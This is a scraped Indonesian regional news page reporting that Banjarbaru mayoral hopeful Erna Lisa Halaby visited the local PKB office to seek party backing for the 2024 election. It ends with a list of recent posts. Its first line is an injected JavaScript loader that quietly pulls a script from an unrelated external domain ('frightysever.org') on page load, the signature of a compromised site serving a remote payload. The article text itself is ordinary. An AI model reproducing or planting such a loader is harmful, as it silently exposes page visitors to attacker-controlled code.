(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pemilu 2024

Lawatan ke PKB, Upaya Lisa Halaby Mencari Partai Pengusung


KANALKALIMANTAN.COM, BANJARBARU – Bakal calon Wali Kota Erna Lisa Halaby kembali melakukan lawatan politik menuju kontestasi Pilwali Banjarbaru 2024.

Lisa Halaby, Senin (27/5/2024) siang, menyambangi kantor DPC Partai Kebangkitan Bangsa (PKB) Kota Banjarbaru menyerahkan formulir pendaftaran pencalon sebagai Wali Kota Banjarbaru.

Lisa mengatakan, masih dua partai lagi yang akan didatangi, yakni PPP dan PDIP dalam rangka mendapatkan partai politik pengusung pencalonan Wali Kota Banjarbaru.

Baca juga: Potensi Poros Koalisi Pilgub Kalsel Masuk ke Pilwali Banjarbaru

“Insyaallah melakukan diskusi dulu, dengan sisa partai yang ada, dan selanjutnya kita menunggu arahan lagi,” ujar Lisa Halaby, Senin (27/5/2024) siang.

Terkait bakal calon pasangan, dia mengungkapkan, masih dalam tahapan penjajakan dengan menjalin silaturahim dengan semua bakal calon yang ada.

“Proses selanjutnya, penentuan wakil masih penjajakan, kalau bayangan dari pribadi terkait kriteria yang cocok sudah ada,” jelas dia.

Baca juga: Bukan Kader Parpol, Lisa Halaby Berani Lamar Banyak Parpol

Di sisi lain Ketua DPC PKB Banjarbaru, Ririk Sumari mengatakan, Lisa Halaby adalan calon kepala daerah keempat yang datang ke PKB.

Dirinya mengatakan tetap pada proses penjaringan, termasuk proses lobi politik antar partai politik masih berjalan hingga nanti pendaftaran calon kepala daerah di KPU pada Agustus mendatang.

“Segala kemungkinan bisa saja terjadi. Kalau bu Lisa menentukan misalkan mau calon dengan wakil PKB atau maunya dengan siapa siap saja,” ujar Ririk Sumari.

Baca juga: Abdi Dekati PAN, Emi: Harus Komitmen Menangkan H Muhidin di Pilgub Kalsel

Ririk mengapreasiasi langkah Lisa Halaby senagai tokoh wanita di Banjarbaru yang berani mencalonkan diri sebagai Wali Kota Banjarbaru.

“Ini salah satu yang patut kita acungi jempol, beliau siap dan insyaallah mampu ke depannya membawa Banjarbaru lebih baik,” tuntas Ririk. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Salat Idul Adha di Masjid Al Karomah, Ini Harapan Wabup Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bersama ulama para habaib dan masyarakat, Wakil Bupati Banjar Habib Idrus Al… Read More

5 jam ago

Pj Bupati HSU dan Sekda Salat Ied di Masjid Raya At-Taqwa Amuntai

KANALKALIMANTAN.COM, AMUNTAI - Berbaur dengan ribuan jemaah, Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly… Read More

6 jam ago

Polres HSU Sembelih Belasan Hewan Kurban

KANALKALIMANTAN.COM, AMUNTAI - Polres Hulu Sungai Utara (HSU) melakukan penyembelihan belasan hewan kurban pada Hari… Read More

8 jam ago

Tinggalkan Plastik, Bakul Purun Jadi Wadah Daging Kurban di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Penyelenggaraan ibadah kurban Iduladha 1445 Hijriah di Banjarbaru menerapkan sistem ramah lingkungan.… Read More

11 jam ago

Panitia Kurban Masjid Hajjah Nuriyah Banjarbaru Sembelih 14 Ekor Sapi

KANALKALIMANTAN.COM, BANJARBARU - Momen ibadah kurban Iduladha 1445 hijriah menjadi ajang silaturahim dan gotong royong… Read More

13 jam ago

Jemaah Haji Asal Tabalong Wafat Jelang Wukuf Arafah

KANALKALIMANTAN.COM, BANJARMASIN - Kabar duka datang dari Kloter 18 Haji Embarkasi Banjarmasin, seorang jemaah haji… Read More

1 hari ago

This website uses cookies.